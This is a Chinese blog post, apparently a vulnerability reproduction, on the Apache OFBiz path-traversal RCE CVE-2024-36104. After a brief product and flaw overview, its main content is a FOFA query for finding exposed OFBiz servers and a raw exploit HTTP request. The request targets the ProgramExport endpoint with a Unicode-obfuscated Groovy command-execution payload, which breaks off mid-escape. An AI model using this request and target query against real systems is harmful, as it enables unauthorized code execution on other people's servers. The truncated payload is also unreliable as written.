【漏洞复现】Apache OFBiz 路径遍历导致RCE漏洞(CVE-2024-36104)

0x01 产品简介

Apache OFBiz是一个功能强大、易于定制和扩展的开源ERP系统,适用于各种类型的企业。通过利用最新的技术标准和开源项目,Apache OFBiz为企业提供了一个高效、稳定、灵活的电子商务平台解决方案。

0x02 漏洞概述

Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径(请求URL中的特殊字符(如 ;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。

0x03 测绘语句

fofa: app="Apache_OFBiz"

0x04 漏洞复现

payload使用了Unicode编码
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u0074\u00

最近更新

  1. TCP协议是安全的吗?

    2024-06-07 17:48:05       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-07 17:48:05       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-07 17:48:05       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-07 17:48:05       20 阅读

热门阅读

  1. Jtti:linux云主机重启网络服务报错如何解决

    2024-06-07 17:48:05       6 阅读
  2. windows 安装pnpm

    2024-06-07 17:48:05       9 阅读
  3. 测绘航空摄影乙级资质变更申请流程

    2024-06-07 17:48:05       8 阅读
  4. 一起学习 ABP (1) 项目入口

    2024-06-07 17:48:05       8 阅读
  5. Go基础编程 - 04 - 基本类型、常量和变量

    2024-06-07 17:48:05       9 阅读
  6. SpringBoot整合AES+RSA加密(含前端代码)

    2024-06-07 17:48:05       9 阅读
  7. Python AI相关库介绍及使用指南

    2024-06-07 17:48:05       9 阅读
  8. Spring Boot(七十八):实现API 多版本控制

    2024-06-07 17:48:05       10 阅读